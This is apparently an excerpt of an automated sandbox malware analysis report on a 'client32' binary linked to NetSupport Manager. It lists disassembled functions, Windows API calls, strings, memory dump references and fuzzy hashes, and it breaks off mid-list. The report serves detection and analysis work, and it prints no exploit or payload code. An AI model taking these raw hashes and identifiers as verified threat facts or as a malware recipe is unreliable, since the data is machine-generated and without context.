                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                • API String ID: 175691280-2052047905
                                                                                • Opcode ID: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                • Instruction ID: d047ce25565584385d90dc1a88bf85935da342945f7d0a1e0c7239cac7a22c38
                                                                                • Opcode Fuzzy Hash: 80bf54f75d60de959a569c8df654b715eddbd256bd047d3a81eed0e5ac7c8735
                                                                                • Instruction Fuzzy Hash: 1AF0A475A0025CBBCB00DED4DC40BEEFBA8AB45208F004099F549A7140DE706A55C7A9
                                                                                Function 1109D810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                                • SetLastError.KERNEL32(00000078,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D84D
                                                                                Strings
                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorA, xrefs: 1109D81E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastProc
                                                                                • String ID: ConvertStringSecurityDescriptorToSecurityDescriptorA
                                                                                • API String ID: 199729137-262600717
                                                                                • Opcode ID: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
                                                                                • Instruction ID: a7eb98fa6670c8ef5a6ef58352877086b50851194238c89ec414a48c6dd1b06f
                                                                                • Opcode Fuzzy Hash: 7111d195e66c423c04a8cdecdaa052cea34c6f9f6774aeedc819551a2fab5bee
                                                                                • Instruction Fuzzy Hash: 2EF05E72A41228AFD724CF94E944A97B7E8EB48710F00491AF95A97640C670E810CBA0
                                                                                Function 1115F340 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                                • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                                • API String ID: 1134434899-3115850912
                                                                                • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                                • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                                • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                                Function 110151E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                                • m_hWnd, xrefs: 110151F9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                • API String ID: 819365019-3966830984
                                                                                • Opcode ID: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                • Instruction ID: 9699e87d833f238af44183ea9879e136ee952ee53a84507d201ef9d6a93955d8
                                                                                • Opcode Fuzzy Hash: bd39cd011623ecfe06393bf57d51be560d8a4fd4800ff0bf8f32089dc2d64717
                                                                                • Instruction Fuzzy Hash: 19F0FEB5D0025DABCB14DF95DC85EDAB7F8EB4D310F00852AFD29A7240E770A950CBA5
                                                                                Function 110173D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                                • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastProc
                                                                                • String ID: QueueUserWorkItem
                                                                                • API String ID: 199729137-2469634949
                                                                                • Opcode ID: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                • Instruction ID: 14daf5f2905bb7c6da6366d36066c9679ffc6904d36036c61edd8dc8337596d2
                                                                                • Opcode Fuzzy Hash: 0f94a6c9280d95f6267a0057a90355b84bcc2892604fd1d5b79f284ec07f3bb7
                                                                                • Instruction Fuzzy Hash: 06F01C72A50628AFD714DFA4D948E9BB7E8FB54721F00852AFD5597A04C774F840CBA0
                                                                                Function 11029790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • CreateThread.KERNEL32(00000000,00000000,11027530,00000000,00000000,00000000), ref: 110297DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread__wcstoi64
                                                                                • String ID: *TapiFixPeriod$Bridge
                                                                                • API String ID: 1152747075-2058455932
                                                                                • Opcode ID: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                • Instruction ID: 741f43c1c8d280c886d6f15773e052eeed2c6ce1e0fea61ed055b6fa2ceaecb0
                                                                                • Opcode Fuzzy Hash: 5b6fa3ef66d65aabb834f1bac3e66e018aa2f987c08b040d8e6299ac416ecad2
                                                                                • Instruction Fuzzy Hash: 24F0ED39B42338ABE711CEC1DC42F71B698A300708F0004B8F628A91C9E6B0A90083A6
                                                                                Function 1115B8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowTextLengthA.USER32(76961A30), ref: 1115B8C3
                                                                                  • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                  • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                • GetWindowTextA.USER32(76961A30,00000000,00000001), ref: 1115B8DD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: TextWindow$Length_malloc_memset
                                                                                • String ID: ...
                                                                                • API String ID: 2795061067-1685331755
                                                                                • Opcode ID: 713777570d7c9697d218dfe7d24bc4d67ffae7820faad57aa0902fa453d29927
                                                                                • Instruction ID: 4b1d5b0fb85ecc65756fa04cbc49f4114121db69e5f1a8b46b9f358c176aa325
                                                                                • Opcode Fuzzy Hash: 713777570d7c9697d218dfe7d24bc4d67ffae7820faad57aa0902fa453d29927
                                                                                • Instruction Fuzzy Hash: A5E0E565A041965FC2404639AA4898BFF59FB86208B044430F0B6D7105DA24E40987E0
                                                                                Function 1101D320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                                • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastProc
                                                                                • String ID: FlashWindowEx
                                                                                • API String ID: 199729137-2859592226
                                                                                • Opcode ID: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                • Instruction ID: 7fa6031e8bb94c9d2945b427b42de2899da1a72ad2875e3a9dcb47a7bac4ba5f
                                                                                • Opcode Fuzzy Hash: bbe273fc43b33a73958d1f5ff023c045b956bd3b29a261bef0c34649876a7d0d
                                                                                • Instruction Fuzzy Hash: 83E01272A412389FD324EBE9A848B4AF7E89B54765F01442AEA5597904C675E8408B90
                                                                                Function 11001090 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110010A6
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 2046328329-2830328467
                                                                                • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                                • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                                • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                                Function 11001050 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 11001066
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 819365019-2830328467
                                                                                • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                                • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                                • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                                Function 110010E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110010F6
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
